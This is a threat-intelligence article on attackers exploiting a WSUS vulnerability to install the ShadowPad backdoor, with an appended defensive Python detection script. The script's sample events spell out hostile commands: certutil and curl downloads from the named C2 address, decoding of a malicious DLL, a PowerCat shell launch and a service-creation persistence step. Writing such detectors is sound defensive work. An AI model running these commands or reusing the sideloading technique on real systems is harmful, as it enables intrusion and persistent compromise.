Chinese-backed attackers are actively exploiting a critical remote code execution vulnerability in Microsoft Windows Server Update Services (WSUS) to distribute the sophisticated ShadowPad backdoor malware. This exploitation, leveraging CVE-2025-59287, allows threat actors to gain system-level access and compromise enterprise networks running the WSUS infrastructure. The surge in activity follows the public release of proof-of-concept code for the vulnerability in October, indicating a rapid adoption by malicious actors keen on leveraging this new attack vector.
The attack chain commences with threat actors targeting Windows Servers configured with WSUS. By exploiting CVE-2025-59287, they achieve initial system access. Once a foothold is established, the attackers proceed to deploy PowerCat, an open-source PowerShell-based utility. PowerCat provides direct command shell access, serving as the first-stage tool that enables the subsequent execution of commands necessary for deploying more advanced malware, including the ShadowPad backdoor.
Chinese Hackers Exploit WSUS Vulnerability for ShadowPad Deployment
Security analysts at ASEC first identified this new attack pattern after observing the use of PowerCat execution commands in ongoing malicious activities. The researchers detailed a method where threat actors employ legitimate Windows utilities, such as certutil and curl, to download and install ShadowPad. This technique is particularly effective at evading detection, as these tools are standard components of Windows operating systems, making their usage less conspicuous to security monitoring systems.
The observed malicious activity on November 6th involved attackers downloading multiple encoded files. These files were subsequently decoded and executed, ultimately delivering the ShadowPad payload to compromised systems. This methodology highlights the attackers’ reliance on stealthy techniques to infiltrate and maintain access within targeted networks.
Persistence Through DLL Sideloading
ShadowPad employs a sophisticated evasion technique known as DLL sideloading to ensure its persistence and operational security. Instead of running as an independent executable file, the malware leverages a legitimate Windows application, specifically ETDCtrlHelper.exe. This legitimate program is tricked into loading a malicious Dynamic Link Library (DLL), ETDApix.dll, that carries the name of a library the program expects to load.
When the legitimate ETDCtrlHelper.exe is executed, it inadvertently loads the compromised ETDApix.dll. This malicious DLL then acts as a loader for the core ShadowPad backdoor, which operates entirely in memory. The actual malware functionality and its complete backdoor configuration data are stored within a temporary file, further obscuring its presence and making it harder to detect through traditional file-scanning methods.
To maintain its presence on an infected system, ShadowPad establishes persistence by creating services, registry entries, and scheduled tasks under the identifier “Q-X64.” Communication with command-and-control (C2) servers, identified at the IP address 163.61.102[.]245, is conducted using standard HTTP and HTTPS protocols. Intriguingly, the malware disguises its C2 traffic to resemble that of a legitimate Firefox browser, utilizing common Firefox headers to blend in with normal network activity.
Furthermore, ShadowPad exhibits the capability to inject itself into various system processes, including Windows Mail, Media Player, and svchost services. This multi-process injection enhances its ability to evade detection and persist across different system functions.
Organizations that utilize WSUS are strongly advised to promptly apply Microsoft’s security update addressing CVE-2025-59287. Additionally, continuous monitoring of server logs for suspicious PowerShell, certutil, and curl execution patterns is crucial for detecting potential compromise attempts. The ongoing exploitation of this vulnerability underscores the importance of timely patching and vigilant network security practices to mitigate the risk posed by advanced persistent threats.
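The monitoring advice above can be turned into simple detection logic. The following is an added example, not code from ASEC or the article: it applies the indicators the report names (certutil and curl download activity, PowerCat launched through PowerShell, the "Q-X64" persistence identifier, ETDCtrlHelper.exe, and the C2 address) to constructed process-creation records flattened to the form `Image|CommandLine`. The treatment of user-writable directories as the suspicious location for ETDCtrlHelper.exe is an assumption of this example, not something the report states.

```python
import re

# Constructed process-creation events in "Image|CommandLine" form (the two
# fields of a Sysmon Event ID 1 or Security 4688 record that matter here).
# Made-up lines for this demonstration, not captured telemetry. The C2
# address is the one the report gives (defanged there as 163.61.102[.]245).
SAMPLE_EVENTS = [
    r"C:\Windows\System32\certutil.exe|certutil -urlcache -split -f http://163.61.102.245/s.txt C:\Users\Public\s.txt",
    r"C:\Windows\System32\certutil.exe|certutil -decode C:\Users\Public\s.txt C:\Users\Public\ETDApix.dll",
    r"C:\Windows\System32\curl.exe|curl -o C:\Users\Public\ETDCtrlHelper.exe http://163.61.102.245/h.bin",
    r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe|powershell -File C:\Users\Public\powercat.ps1",
    r"C:\Windows\System32\sc.exe|sc create Q-X64 binPath= C:\Users\Public\ETDCtrlHelper.exe start= auto",
    r"C:\Users\Public\ETDCtrlHelper.exe|C:\Users\Public\ETDCtrlHelper.exe",
    r"C:\Windows\System32\certutil.exe|certutil -verify C:\certs\server.cer",  # benign
    r"C:\Windows\System32\curl.exe|curl -I https://www.microsoft.com",         # benign
]

# Assumption of this example: a sideloading host binary dropped by an attacker
# sits in a user-writable directory rather than its vendor install path.
USER_WRITABLE = r"(?:\\Users\\Public\\|\\ProgramData\\|\\Temp\\|\\AppData\\)"

# Each rule: (name, regex on the Image field, regex on the CommandLine field).
RULES = [
    ("certutil_download_or_decode", r"\\certutil\.exe$", r"-(?:urlcache|decode)\b"),
    ("curl_write_to_disk", r"\\curl\.exe$", r"(?:^|\s)-[oO]\s"),
    ("powercat_launch", r"\\powershell\.exe$", r"powercat"),
    ("qx64_persistence", r"\\(?:sc|schtasks|reg)\.exe$", r"Q-X64"),
    ("etdctrlhelper_sideload_path", USER_WRITABLE + r"ETDCtrlHelper\.exe$", r".*"),
    ("known_c2_address", r".*", r"163\.61\.102\.245"),
]


def scan_events(events):
    """Return (rule_name, event) pairs for every rule each event trips."""
    hits = []
    for event in events:
        image, _, cmdline = event.partition("|")
        for name, image_re, cmd_re in RULES:
            if re.search(image_re, image, re.IGNORECASE) and re.search(cmd_re, cmdline, re.IGNORECASE):
                hits.append((name, event))
    return hits


def rule_counts(events):
    """Count how often each rule fired; useful as a quick triage summary."""
    counts = {}
    for name, _ in scan_events(events):
        counts[name] = counts.get(name, 0) + 1
    return counts
```

The two benign lines at the end of the sample show that the rules key on download and decode switches rather than on the presence of certutil or curl alone, since both tools are in constant legitimate use on Windows servers.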

